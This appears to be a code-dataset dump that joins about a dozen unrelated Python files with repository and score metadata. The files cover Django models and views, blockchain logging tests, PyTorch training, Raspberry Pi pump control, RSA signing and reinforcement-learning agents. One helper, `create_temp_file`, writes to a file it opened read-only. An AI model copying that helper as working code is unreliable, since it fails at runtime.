class Migration(migrations.Migration):
dependencies = [
('daiquiri_metadata', '0024_django2'),
]
operations = [
migrations.AddField(
model_name='schema',
name='published',
field=models.DateField(blank=True, null=True, verbose_name='Published'),
),
migrations.AddField(
model_name='schema',
name='updated',
field=models.DateField(blank=True, null=True, verbose_name='Updated'),
),
migrations.AddField(
model_name='table',
name='published',
field=models.DateField(blank=True, null=True, verbose_name='Published'),
),
migrations.AddField(
model_name='table',
name='updated',
field=models.DateField(blank=True, null=True, verbose_name='Updated'),
),
]
| 0.765625 | 1 |
plenum/test/logging/test_logging_txn_state.py | steptan/indy-plenum | 0 | 44932 | <gh_stars>0
import functools
from stp_core.loop.eventually import eventually
from plenum.common.constants import STEWARD, DOMAIN_LEDGER_ID
from plenum.test.pool_transactions.conftest import looper, stewardAndWallet1, \
steward1, stewardWallet, client1, clientAndWallet1, client1Connected
from plenum.test.pool_transactions.helper import sendAddNewClient
from plenum.test import waits
from plenum.test.helper import ensureRejectsRecvd, sdk_send_random_and_check
ERORR_MSG = "something went wrong"
whitelist = [ERORR_MSG]
def testLoggingTxnStateForValidRequest(
looper, logsearch, txnPoolNodeSet,
sdk_pool_handle, sdk_wallet_client):
logsPropagate, _ = logsearch(
levels=['INFO'], files=['propagator.py'],
funcs=['propagate'], msgs=['propagating.*request.*from client']
)
logsOrdered, _ = logsearch(
levels=['INFO'], files=['replica.py'],
funcs=['order_3pc_key'], msgs=['ordered batch request']
)
logsCommited, _ = logsearch(
levels=['INFO'], files=['node.py'],
funcs=['executeBatch'], msgs=['committed batch request']
)
reqs = sdk_send_random_and_check(looper, txnPoolNodeSet, sdk_pool_handle, sdk_wallet_client, 1)
req, _ = reqs[0]
reqId = str(req['reqId'])
assert any(reqId in record.getMessage() for record in logsPropagate)
assert any(reqId in record.getMessage() for record in logsOrdered)
assert any(reqId in record.getMessage() for record in logsCommited)
def testLoggingTxnStateForInvalidRequest(
looper, txnPoolNodeSet, clientAndWallet1, client1Connected, logsearch):
client, clientWallet = clientAndWallet1
logsPropagate, _ = logsearch(
levels=['INFO'], files=['propagator.py'],
funcs=['propagate'], msgs=['propagating.*request.*from client']
)
logsReject, _ = logsearch(
levels=['WARNING'], files=['replica.py'],
funcs=['processReqDuringBatch'],
msgs=['encountered exception.*while processing.*will reject']
)
req, wallet = sendAddNewClient(STEWARD, "name", client, clientWallet)
ensureRejectsRecvd(
looper, txnPoolNodeSet, client,
reason="Only Steward is allowed to do these transactions",
timeout=waits.expectedReqRejectQuorumTime()
)
reqId = str(req.reqId)
assert any(reqId in record.getMessage() for record in logsPropagate)
assert any(reqId in record.getMessage() for record in logsReject)
def testLoggingTxnStateWhenCommitFails(
looper, txnPoolNodeSet, steward1, stewardWallet, logsearch):
logsPropagate, _ = logsearch(
levels=['INFO'], files=['propagator.py'],
funcs=['propagate'], msgs=['propagating.*request.*from client']
)
logsOrdered, _ = logsearch(
levels=['INFO'], files=['replica.py'],
funcs=['order_3pc_key'], msgs=['ordered batch request']
)
logsCommitFail, _ = logsearch(
levels=['WARNING'], files=['node.py'],
funcs=['executeBatch'], msgs=['commit failed for batch request']
)
req, wallet = sendAddNewClient(None, "name", steward1, stewardWallet)
class SomeError(Exception):
pass
def commitPatched(node, commitOrig, *args, **kwargs):
req_handler = node.get_req_handler(ledger_id=DOMAIN_LEDGER_ID)
req_handler.commit = commitOrig
raise SomeError(ERORR_MSG)
excCounter = 0
def executeBatchPatched(node, executeBatchOrig, *args, **kwargs):
nonlocal excCounter
try:
executeBatchOrig(*args, **kwargs)
except SomeError:
excCounter += 1
node.executeBatch = executeBatchOrig
pass
def checkSufficientExceptionsHappend():
assert excCounter == len(txnPoolNodeSet)
return
for node in txnPoolNodeSet:
req_handler = node.get_req_handler(ledger_id=DOMAIN_LEDGER_ID)
req_handler.commit = functools.partial(
commitPatched, node, req_handler.commit
)
node.executeBatch = functools.partial(
executeBatchPatched, node, node.executeBatch
)
timeout = waits.expectedTransactionExecutionTime(len(txnPoolNodeSet))
looper.run(
eventually(checkSufficientExceptionsHappend,
retryWait=1, timeout=timeout))
reqId = str(req.reqId)
assert any(reqId in record.getMessage() for record in logsPropagate)
assert any(reqId in record.getMessage() for record in logsOrdered)
assert any(reqId in record.getMessage() for record in logsCommitFail)
assert any(ERORR_MSG in record.getMessage() for record in logsCommitFail)
| 1.203125 | 1 |
model.py | cynthia3r/flower_image_classifier | 1 | 45060 | <gh_stars>1-10
import torch
from torchvision import models
import time
'''
Functions related to training model
'''
def save_checkpoint(model, optimizer, train_data, arch, save_dir):
# TODO COMPLETED: Save the checkpoint
model.to('cpu')
print("Our model: \n\n", model, '\n')
print("The state dict keys: \n\n", model.state_dict().keys())
# Saving the model (The trained model is saved as a checkpoint along with associated
# hyperparameters and the class_to_idx dictionary)
checkpoint = {'classifier': model.classifier,
'class_to_idx': train_data.class_to_idx,
'state_dict': model.state_dict(),
'arch': arch,
'optimizer': optimizer,
'optimizer_state_dict': optimizer.state_dict()}
torch.save(checkpoint, save_dir)
# TODO COMPLETED: Write a function that loads a checkpoint and rebuilds the model
# Loading checkpoints (The function successfully loads a checkpoint and rebuilds the model)
def load_checkpoint(model_input):
checkpoint = torch.load(model_input)
if checkpoint['arch'] == 'vgg16':
model = models.vgg16(pretrained=True)
elif checkpoint['arch'] == 'densenet121':
model = models.densenet121(pretrained=True)
model.classifier = checkpoint['classifier']
model.class_to_idx = checkpoint['class_to_idx']
model.load_state_dict(checkpoint['state_dict'])
# load the optimizer from saved checkpoint
optimizer = checkpoint['optimizer']
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
return model, optimizer
# Define Validation function for the model
def validate_model(model, validloader, criterion, device):
valid_loss = 0
accuracy = 0
model.to(device)
# Looping through it, get a batch on each loop
# validation pass here
for images, labels in validloader:
images, labels = images.to(device), labels.to(device)
# Forward pass, get our log-probabilities
outputs = model.forward(images)
# Calculate the loss with the calculated log-probabilities and the labels
valid_loss += criterion(outputs, labels)
# Calculate accuracy
# Output of the network are log-probabilities, need to take exponential for probabilities
ps = torch.exp(outputs)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor))
return valid_loss, accuracy
# Training a network: successfully trains a new network on a dataset of images
# Model hyperparameters: The training model run based on user set hyperparameters such as training epochs
# Training with GPU: The training model allows users to choose training the model based on device (gpu, cpu)
def train_model(model, trainloader, validloader, criterion, num_epochs, optimizer, device):
# TODO COMPLETED: Build and train your network
# Training the network (The parameters of the feedforward classifier are appropriately trained,
# while the parameters of the feature network are left static)
steps = 0
batch_size = 16
train_losses, valid_losses = [], []
model.to(device)
for epoch in range(num_epochs):
epoch_start_time = time.time()
running_loss = 0
for images, labels in trainloader:
# Move input and label tensors to the default device
images, labels = images.to(device), labels.to(device)
steps += 1
# Clear the gradients, do this because gradients are accumulated
optimizer.zero_grad()
# Forward pass, then backward pass, then update weights
# Forward pass, get our log-probabilities
outputs = model.forward(images)
# Calculate the loss with the calculated log-probabilities and the labels
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % batch_size == 0:
# Validate model
valid_loss = 0
accuracy = 0
# set model to evaluation mode for predictions
model.eval()
# Turn off gradients for validation, saves memory and computations
with torch.no_grad():
valid_loss, accuracy = validate_model(model, validloader, criterion, device)
train_losses.append(running_loss / len(trainloader))
valid_losses.append(valid_loss / len(validloader))
# Training validation log: The training loss, validation loss, and
# validation accuracy are printed out as a network trains
print("Epoch: {}/{}.. ".format(epoch + 1, num_epochs),
"Training Loss: {:.3f}.. ".format(train_losses[-1]),
"Validation Loss: {:.3f}.. ".format(valid_losses[-1]),
"Validation Accuracy: {:.3f}%".format((100 * accuracy) / len(validloader)))
running_loss = 0
# set model back to train mode
model.train()
# Calculate and print Epoch duration
epoch_time_elapsed = time.time() - epoch_start_time
print("Epoch {} Run Time: {:.0f}m {:.0f}s".format(epoch + 1, epoch_time_elapsed // 60, epoch_time_elapsed % 60))
return model, optimizer
# TODO COMPLETED: Do validation on the test input data
def test_model(model, testloader, device):
accuracy = 0
model.to(device)
# Turn off gradients for validation, saves memory and computations
with torch.no_grad():
# set model to evaluation mode for predictions
model.eval()
# Looping through it, get a batch on each loop
# test validation pass here
for images, labels in testloader:
images, labels = images.to(device), labels.to(device)
outputs = model.forward(images)
# Calculate accuracy
# Get the class probabilities
ps = torch.exp(outputs)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class == labels.view(*top_class.shape)
accuracy += torch.mean(equals.type(torch.FloatTensor))
# set model back to train mode
model.train()
# Testing Accuracy (The network's accuracy is measured on the test data)
print("Test Accuracy: {:.3f}%".format(100 * accuracy / len(testloader)))
| 2.28125 | 2 |
_task.py | zemogle/twittervotes | 0 | 45188 | from tempfile import mkstemp
import os
import tinys3
def create_temp_file(data):
fd, temp_path = mkstemp()
file = open(temp_path, 'r')
file.write(data)
file.close()
os.close(fd)
return data
def push_to_s3(filepath):
s3 = tinys3.Connection(os.environ['AWS_ACCESS_KEY_ID'],os.environ['AWS_SECRET_KEY'],tls=True)
f = open(filepath,'rb')
s3.upload(filepath, f ,'darkmattersheep.uk/strictly/')
return
| 1.398438 | 1 |
greenpithumb/pump.py | markselias/GreenPiThumb | 83 | 45316 | import logging
logger = logging.getLogger(__name__)
# Pump rate in mL/s (4.3 L/min)
_PUMP_RATE_ML_PER_SEC = 4300.0 / 60.0
# Default amount of water to add to the plant (in mL) when pump manager detects
# low soil moisture.
DEFAULT_PUMP_AMOUNT = 200
class Pump(object):
"""Wrapper for a Seaflo 12V water pump."""
def __init__(self, pi_io, clock, pump_pin):
"""Creates a new Pump wrapper.
Args:
pi_io: Raspberry Pi I/O interface.
clock: A clock interface.
pump_pin: Raspberry Pi pin to which the pump is connected.
"""
self._pi_io = pi_io
self._clock = clock
self._pump_pin = pump_pin
def pump_water(self, amount_ml):
"""Pumps the specified amount of water.
Args:
amount_ml: Amount of water to pump (in mL).
Raises:
ValueError: The amount of water to be pumped is invalid.
"""
if amount_ml == 0.0:
return
elif amount_ml < 0.0:
raise ValueError('Cannot pump a negative amount of water')
else:
logger.info('turning pump on (with GPIO pin %d)', self._pump_pin)
self._pi_io.turn_pin_on(self._pump_pin)
wait_time_seconds = amount_ml / _PUMP_RATE_ML_PER_SEC
self._clock.wait(wait_time_seconds)
logger.info('turning pump off (with GPIO pin %d)', self._pump_pin)
self._pi_io.turn_pin_off(self._pump_pin)
logger.info('pumped %.f mL of water', amount_ml)
return
class PumpManager(object):
"""Pump Manager manages the water pump."""
def __init__(self, pump, pump_scheduler, moisture_threshold, pump_amount,
timer):
"""Creates a PumpManager object, which manages a water pump.
Args:
pump: A pump instance, which supports water pumping.
pump_scheduler: A pump scheduler instance that controls the time
periods in which the pump can be run.
moisture_threshold: Soil moisture threshold. If soil moisture is
below this value, manager pumps water on pump_if_needed calls.
pump_amount: Amount (in mL) to pump every time the water pump runs.
timer: A timer that counts down until the next forced pump. When
this timer expires, the pump manager runs the pump once,
regardless of the moisture level.
"""
self._pump = pump
self._pump_scheduler = pump_scheduler
self._moisture_threshold = moisture_threshold
self._pump_amount = pump_amount
self._timer = timer
def pump_if_needed(self, moisture):
"""Run the water pump if there is a need to run it.
Args:
moisture: Soil moisture level
Returns:
The amount of water pumped, in mL.
"""
if self._should_pump(moisture):
self._pump.pump_water(self._pump_amount)
self._timer.reset()
return self._pump_amount
return 0
def _should_pump(self, moisture):
"""Returns True if the pump should be run."""
if not self._pump_scheduler.is_running_pump_allowed():
return False
return (moisture < self._moisture_threshold) or self._timer.expired()
class PumpScheduler(object):
"""Controls when the pump is allowed to run."""
def __init__(self, local_clock, sleep_windows):
"""Creates new PumpScheduler instance.
Args:
local_clock: A local clock interface
sleep_windows: A list of 2-tuples, each representing a sleep window.
Tuple items are datetime.time objects.
"""
self._local_clock = local_clock
self._sleep_windows = sleep_windows
def is_running_pump_allowed(self):
"""Returns True if OK to run pump, otherwise False.
Pump is not allowed to run from the start of a sleep window (inclusive)
to the end of a sleep window (exclusive).
"""
current_time = self._local_clock.now().time()
for sleep_time, wake_time in self._sleep_windows:
# Check if sleep window wraps midnight.
if wake_time < sleep_time:
if current_time >= sleep_time or current_time < wake_time:
return False
else:
if sleep_time <= current_time < wake_time:
return False
return True
| 2.5 | 2 |
python/Clique_Percolation_Method.py | JasonPap/graphproject | 1 | 45444 | __author__ = 'Jason'
import itertools
from Graph import *
from GraphStatistics import *
def get_cliques(graph, k, proc_pool):
persons = []
for idx in graph.dictionary:
persons.append(idx)
cliques = []
combinations = itertools.combinations(persons, k)
arg = []
for comb in combinations:
arg.append((comb, graph))
results = proc_pool.map(test, arg)
for result in results:
if result[0] == True:
cliques.append(result[1])
return cliques
def test(arg):
combination = arg[0]
graph = arg[1]
local_comb = list(combination)
for idx in combination:
others = list(local_comb)
others.remove(idx)
links = graph.dictionary[idx].links
linked_ids = []
for edge in links:
linked_ids.append(edge.edge_end)
for neighbour in others:
if neighbour not in linked_ids:
return False, None
local_comb.remove(idx)
return True, combination
def percolation_method(graph, k, proc_pool):
l_cliques = get_cliques(graph, k, proc_pool)
g_cliques = Graph()
for i in range(len(l_cliques)):
node = Node(i, [], [])
g_cliques.insert_node(node)
arg = []
for i in range(len(l_cliques)):
arg.append((i, l_cliques, k))
results = proc_pool.map(get_hyper_edges, arg)
for result in results:
for hyper_edge in result:
edge = Edge(hyper_edge[1], [])
g_cliques.insert_edge(hyper_edge[0], edge)
cc = get_connected_components(g_cliques)
communities = []
counter = 1
for component in cc:
persons = []
for clique_id in component:
for p_id in l_cliques[clique_id]:
if p_id not in persons:
persons.append(p_id)
persons.sort()
communities.append((counter, persons))
counter += 1
return communities
def get_hyper_edges(arg):
clique_id = arg[0]
l_cliques = arg[1]
k = arg[2]
result = []
main_clique = l_cliques[clique_id]
for i in range(len(l_cliques)):
counter = 0
if i != clique_id:
for val in main_clique:
if val in l_cliques[i]:
counter += 1
if counter >= k - 1:
result.append((clique_id, i))
return result
| 2.421875 | 2 |
utils/rsa.py | vsgobbi/nfe-library | 0 | 45572 | from base64 import b64encode
from hashlib import sha1
from Crypto.Hash import SHA
from Crypto.Signature import PKCS1_v1_5
from Crypto.PublicKey import RSA
class Rsa:
@classmethod
def sign(cls, text, privateKeyContent):
digest = SHA.new(text)
rsaKey = RSA.importKey(privateKeyContent)
signer = PKCS1_v1_5.new(rsaKey)
signature = signer.sign(digest)
return b64encode(signature)
@classmethod
def digest(cls, text):
hasher = sha1()
hasher.update(text)
digest = hasher.digest()
return b64encode(digest)
| 1.523438 | 2 |
commit_data.py | iwangjian/ByteCup2018 | 80 | 45700 | <filename>commit_data.py
import os
import argparse
def process_decoded(args):
if not os.path.exists(args.result_dir):
os.mkdir(args.result_dir)
punct = ["/", "`", "+", "-", ";", "-lrb-", "-rrb-", "``", "|", "~", """]
for file in os.listdir(args.decode_dir):
file_path = os.path.join(args.decode_dir, file)
file_id = int(str(file).split('.')[0]) + 1
res_file = str(file_id) + '.txt'
res_path = os.path.join(args.result_dir, res_file)
temp = []
with open(file_path, 'r') as fr:
text = fr.read().strip()
data = text.split(" ")
for word in data:
if not word in punct:
temp.append(word)
with open(res_path, 'w', encoding='utf-8') as fw:
fw.write(" ".join(temp))
fw.write('\n')
print("Finished: %s" % args.result_dir)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert decoded files to commit files')
parser.add_argument('--decode_dir', action='store', required=True,
help='directory of decoded summaries')
parser.add_argument('--result_dir', action='store', required=True,
help='directory of submission')
args = parser.parse_args()
process_decoded(args)
| 1.726563 | 2 |
Discrete2D/torch-ac-composable/torch_ac_composable/models/acmodel_modular_fixed.py | Lifelong-ML/Mendez2022ModularLifelongRL | 0 | 45828 | '''
This version uses a Q function for PPO, the same that is
later used for BCQ
'''
import torch
import torch.nn as nn
import torch.autograd as autograd
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
import random
import numpy as np
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
class ACModelModularFixed(nn.Module):
def __init__(
self,
input_shape,
num_actions,
agent_dyn_dict,
static_object_dict,
target_object_dict,
max_modules=0,
threshold=0.3,
device=torch.device('cuda'),
):
super().__init__()
self.use_bcq = {}
self.threshold = threshold
self.device = device
if isinstance(max_modules, (int, float)):
max_modules = max_modules if max_modules != 0 else np.inf
max_modules = [max_modules] * 4
# List of selections of modules per task
self.static_object_dict = static_object_dict
self.target_object_dict = target_object_dict
self.agent_dyn_dict = agent_dyn_dict
self.input_shape = input_shape
self.num_actions = num_actions
self.recurrent = False
self.recurrence = 1
self.max_modules = max_modules
self.num_modules = max_modules
self.sizes = [8, 16, 32, 64]
self.num_tasks = 0
# Static object (conv0 and 1)
self.static = nn.ModuleList()
for i in range(max_modules[0]):
self.static.append(nn.Sequential(
nn.Conv2d(5, 8, kernel_size=2),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(8, 16, kernel_size=2),
nn.ReLU()
).to(self.device))
# Target object (conv2)
self.target_pre = nn.ModuleList()
self.target_post = nn.ModuleList()
for i in range(max_modules[1]):
self.target_pre.append(nn.Sequential(
nn.Conv2d(1, 8, kernel_size=2),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(8, 16, kernel_size=2),
nn.ReLU()
).to(self.device))
self.target_post.append(nn.Sequential(
nn.Conv2d(32, 32, kernel_size=2),
nn.ReLU()
).to(self.device))
# Agent dynamics (actor, critic)
self.agent_pre = nn.ModuleList()
for i in range(max_modules[2]):
self.agent_pre.append(nn.Sequential(
nn.Conv2d(1, 8, kernel_size=2),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(8, 16, kernel_size=2),
nn.ReLU(),
nn.Conv2d(16, 32, kernel_size=2),
nn.ReLU()
).to(self.device))
self.actor_layers = nn.ModuleList()
self.critic_layers = nn.ModuleList()
for i in range(max_modules[2]):
self.actor_layers.append(nn.Sequential(
nn.Linear(self.feature_size(), self.sizes[3]),
nn.Tanh(),
nn.Linear(self.sizes[3], self.num_actions)
).to(self.device))
self.critic_layers.append(nn.Sequential(
nn.Linear(self.feature_size(), self.sizes[3]),
nn.Tanh(),
nn.Linear(self.sizes[3], self.num_actions)
).to(self.device))
# Initialize parameters correctly
self.apply(init_params)
self.to(self.device)
def features(self, x, task_id):
n = x.shape[0]
x_static = x[:, :5, :, :]
x_target = x[:, 5:6, :, :]
x_agent = x[:, 6:, :, :]
x_static = self.static[self.static_object_dict[task_id]](x_static)
x_target = self.target_pre[self.target_object_dict[task_id]](x_target)
x_target = torch.cat((x_static, x_target), dim=1)
x_target = self.target_post[self.target_object_dict[task_id]](x_target)
x_agent = self.agent_pre[self.agent_dyn_dict[task_id]](x_agent)
x_agent = torch.cat((x_target, x_agent), dim=1)
return x_agent
def fc(self, x, task_id, return_bc=False):
if return_bc:
x_q = self.critic_layers[self.agent_dyn_dict[task_id]](x)
x_bc = self.actor_layers[self.agent_dyn_dict[task_id]](x)
return x_q, F.log_softmax(x_bc, dim=1), x_bc
x_actor = self.actor_layers[self.agent_dyn_dict[task_id]](x)
x_critic = self.critic_layers[self.agent_dyn_dict[task_id]](x).max(dim=1, keepdim=True)[0]
return x_actor, x_critic
def forward(self, obs, task_id, return_bc=False):
x = obs.image.transpose(1, 3).transpose(2, 3)
x = self.features(x, task_id)
features = x.view(x.size(0), -1)
x = self.fc(features, task_id, return_bc)
if not return_bc:
x_actor, x_critic = x
dist = Categorical(logits=F.log_softmax(x_actor, dim=1))
value = x_critic.squeeze(1)
return dist, value
return x
def feature_size(self):
x = autograd.Variable(torch.zeros(1, *self.input_shape, device=self.device).transpose(1, 3).transpose(2, 3))
x_static = x[:, :5, :, :]
x_target = x[:, 5:6, :, :]
x_agent = x[:, 6:, :, :]
x_static = self.static[0](x_static)
x_target = self.target_pre[0](x_target)
x_target = torch.cat((x_static, x_target), dim=1)
x_target = self.target_post[0](x_target)
x_agent = self.agent_pre[0](x_agent)
x_agent = torch.cat((x_target, x_agent), dim=1)
return x_agent.reshape(1, -1).size(1)
def act(self, state, epsilon, task_id):
# with torch.no_grad():
# q_value, bc_prob, _ = self.forward(state, task_id, return_bc=True)
# bc_prob = bc_prob.exp()
# bc_prob = (bc_prob / bc_prob.max(1, keepdim=True)[0] > self.threshold).float()
# q_value = (bc_prob * q_value + (1 - bc_prob) * -1e8)
# dist = Categorical(logits=F.log_softmax(q_value, dim=1))
# action = dist.sample()
# return action
with torch.no_grad():
q_value, bc_prob, _ = self.forward(state, task_id, return_bc=True)
bc_prob = bc_prob.exp()
bc_prob = (bc_prob / bc_prob.max(1, keepdim=True)[0] > self.threshold).float()
q_value = (bc_prob * q_value + (1 - bc_prob) * -1e8)
dist = Categorical(logits=F.log_softmax(q_value, dim=1))
action = dist.sample()
return action
def add_task(self, task_id, static_object, target_object, agent_dyn):
self.static_object_dict[task_id] = static_object
self.target_object_dict[task_id] = target_object
self.agent_dyn_dict[task_id] = agent_dyn
self.set_use_bcq(task_id, False)
def set_use_bcq(self, task_id, use_bcq=False):
self.use_bcq[task_id] = use_bcq
def anneal_tau(*args, **kwargs):
pass | 2.046875 | 2 |
djfw/pagination/middleware.py | kozzztik/tulius | 1 | 45956 | import asyncio
def get_page(self):
"""
A function which will be monkeypatched onto the request to get the current
integer representing the current page.
"""
try:
if self.POST:
p = self.POST['page']
else:
p = self.GET['page']
if p == 'last':
return 'last'
return int(p)
except (KeyError, ValueError, TypeError):
return 1
def pagination_middleware(get_response):
if asyncio.iscoroutinefunction(get_response):
return AsyncPaginationMiddleware(get_response)
return PaginationMiddleware(get_response)
class PaginationMiddleware:
"""
Inserts a variable representing the current page onto the request object if
it exists in either **GET** or **POST** portions of the request.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
request.page = get_page(request)
return self.get_response(request)
class AsyncPaginationMiddleware:
_is_coroutine = asyncio.coroutines._is_coroutine
def __init__(self, get_response):
self.get_response = get_response
async def __call__(self, request):
request.page = get_page(request)
return await self.get_response(request)
pagination_middleware.async_capable = True
| 1.992188 | 2 |
build/platform/python/tests/test_common.py | jochenater/catboost | 6,989 | 46084 | import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
| 1.289063 | 1 |
django/app_whoami/views.py | a-rey/aaronmreyes_heroku | 1 | 46212 | <reponame>a-rey/aaronmreyes_heroku
import decimal
import ipaddress
import django.http
import django.core.cache
import app_whoami.models
def main(request):
"""
request handler for '/'.
"""
# try to get client IP from HTTP header
raw_ip = request.META.get('HTTP_X_FORWARDED_FOR', request.META.get('REMOTE_ADDR', None))
if not raw_ip:
return django.http.JsonResponse({'error': 'IP header not found'})
# X_FORWARDED_FOR: client1, proxy1, proxy2, ...
raw_ip = raw_ip.split(',')[0].strip()
if not raw_ip:
return django.http.JsonResponse({'error': 'IP header format invalid'})
# try to parse the user IP
try:
ip = ipaddress.ip_address(raw_ip)
results = {'IP': str(ip)}
except:
return django.http.JsonResponse({'error': 'IP header value invalid'})
# check cache if IP already looked up
if int(ip) in django.core.cache.cache:
return django.http.JsonResponse(django.core.cache.cache.get(int(ip)))
# lookup ASN IP block in database
asn_blk = app_whoami.models.AsnBlock.objects.filter(
ip_start__lte=decimal.Decimal(int(ip)),
ip_end__gte=decimal.Decimal(int(ip)),
ipv4=(ip.version == 4)
).values().first()
# combine info into one object
if asn_blk:
results.update(asn_blk)
# lookup city IP block
city_blk = app_whoami.models.CityBlock.objects.filter(
ip_start__lte=decimal.Decimal(int(ip)),
ip_end__gte=decimal.Decimal(int(ip)),
ipv4=(ip.version == 4)
).values().first()
if city_blk:
# from city IP block, lookup city location
city_loc = app_whoami.models.CityLocation.objects.filter(
geoname_id=city_blk['geoname_id']
).values().first()
# combine info into one object
if city_loc:
results.update(city_loc)
results.update(city_blk)
# remove backend lookup values from response
results.pop('id', None)
results.pop('ipv4', None)
results.pop('ip_end', None)
results.pop('ip_start', None)
results.pop('geoname_id', None)
# format creation timestamp
if 'created_at' in results:
results['created_at'] = results['created_at'].strftime('%d %b %Y %H:%M:%S %Z')
# change keys to be uppercase
results = {k.upper(): v for k, v in results.items()}
# store result in cache for a faster hit next lookup request
django.core.cache.cache.set(int(ip), results)
return django.http.JsonResponse(results)
| 1.601563 | 2 |
Game_AI_and_Reinforcement_Learning/ConnectX/v2/actor.py | BEPb/Python-100-days | 16 | 46340 | """
Python 3.9 программа самостоятельной игры агентов текущего и предыдущего покаления
программа на Python по изучению обучения с подкреплением - Reinforcement Learning
Название файла actor.py
Version: 0.1
Author: <NAME>
Date: 2021-12-23
"""
import numpy as np
import parl
import os
from alphazero_agent import create_agent
from MCTS import MCTS
from Arena import Arena
from utils import win_loss_draw
@parl.remote_class(wait=False)
class Actor(object):
def __init__(self, game, args, seed): # инициализация класса
np.random.seed(seed)
os.environ['OMP_NUM_THREADS'] = "1"
self.game = game # экземпляр (объект) класса доски и игры между двумя игроками
self.args = args # принимает все аргументы из главной программы
# 'master_address': 'localhost:8010', # главный адрес кластера xparl
# 'actors_num': 1, # количество удаленных участников
# 'numIters': 1, # общее количество итераций
# 'numEps': 1, # Количество полных игр с самостоятельной игрой для моделирования во время новой итерации.
# 'arenaCompare': 50, # Количество игр, которые нужно сыграть во время игры на арене (питтинг)
# 'numMCTSSims': 800, # Количество игровых ходов для моделирования MCTS.
# 'updateThreshold': 0.8, # пороговое или большее количество игр
# 'cpuct': 4, # CPUCT parameter
# 'dirichletAlpha': 1.0, # альфа-параметр шума дирихле
# 'numItersForTrainExamplesHistory': 20, # история примеров из последних итераций
# 'checkpoint': './saved_model/', # папка для сохранения моделей и обучающих примеров
# neural network of previous generation
# нейронная сеть предыдущего поколения
self.previous_agent = create_agent(self.game, cuda=False)
# neural network of current generation
# нейронная сеть текущего поколения
self.current_agent = create_agent(self.game, cuda=False)
# MCTS of previous generation
# MCTS предыдущего поколения
self.previous_mcts = MCTS(
self.game, self.previous_agent, self.args, dirichlet_noise=True)
# MCTS of current generation
# MCTS текущего поколения
self.current_mcts = MCTS(
self.game, self.current_agent, self.args, dirichlet_noise=True)
def self_play(self, current_weights, game_num):
"""
Сбор данных о тренировках путем самостоятельной игры.
Аргументы:
current_weights (numpy.array): последние веса нейронной сети
game_num (int): номер игры для самостоятельной игры
Возврат:
train_examples (список): примеры формы (canonicalBoard, currPlayer, pi, v)
"""
print('Самостоятельная игра одного из созданных агентов (использует одно ядро)')
# update weights of current neural network with latest weights
# обновить веса текущей нейронной сети с последними весами
self.current_agent.set_weights(current_weights)
train_examples = [] # создаем пустую таблицу (список) тренировки
for _ in range(game_num):
print('Начинается игра №', _)
# reset node state of MCTS
print('сбросить состояние узла MCTS')
self.current_mcts = MCTS(self.game, self.current_agent, self.args, dirichlet_noise=True)
print('тренировка узла MCTS')
train_examples.extend(self._executeEpisode())
# _executeEpisode() - функция одной игры
return train_examples
def pitting(self, previous_weights, current_weights, games_num):
"""Борьба между агентом предыдущего поколения и агентом текущего поколения
Аргументы:
previous_weights (numpy.array): веса нейронной сети предыдущего поколения
current_weights (numpy.array): веса нейронной сети текущего поколения
game_num (int): количество боев в игре
Возврат:
кортеж из (номер игры, в которой выиграл предыдущий агент, номер игры, в которой выиграл текущий агент,
номер игры, в которой был проведен розыгрыш)
"""
print('Борьба')
# update weights of previous and current neural network
# обновить веса предыдущей и текущей нейронной сети
self.previous_agent.set_weights(previous_weights)
self.current_agent.set_weights(current_weights)
# reset node state of MCTS
# сбросить состояние узла MCTS
print('сбросить состояние узла MCTS перед ареной')
self.previous_mcts = MCTS(self.game, self.previous_agent, self.args)
self.current_mcts = MCTS(self.game, self.current_agent, self.args)
arena = Arena(
lambda x: np.argmax(self.previous_mcts.getActionProb(x, temp=0)),
lambda x: np.argmax(self.current_mcts.getActionProb(x, temp=0)),
self.game)
previous_wins, current_wins, draws = arena.playGames(games_num)
return (previous_wins, current_wins, draws) # возвращает количество предудущих побед, текущих побед и ничьих
def evaluate_test_dataset(self, current_weights, test_dataset):
"""
Оценить эффективность новейших нейронных сетей
Аргументы:
current_weights (numpy.array): последние веса нейронной сети
test_dataset (список): номер игры для самостоятельной игры
Возврат:
кортеж из (количество совершенных ходов, количество хороших ходов)
"""
print('Эволюция')
# update weights of current neural network with latest weights
# обновить веса текущей нейронной сети с последними весами
self.current_agent.set_weights(current_weights)
# определяем качество проведенной игры
perfect_move_count, good_move_count = 0, 0
for data in test_dataset:
self.current_mcts = MCTS(self.game, self.current_agent, self.args) # обращаемся к дереву MCTS
x = self.game.getCanonicalForm(data['board'], data['player'])
agent_move = int(np.argmax(self.current_mcts.getActionProb(x, temp=0))) # количество ходов
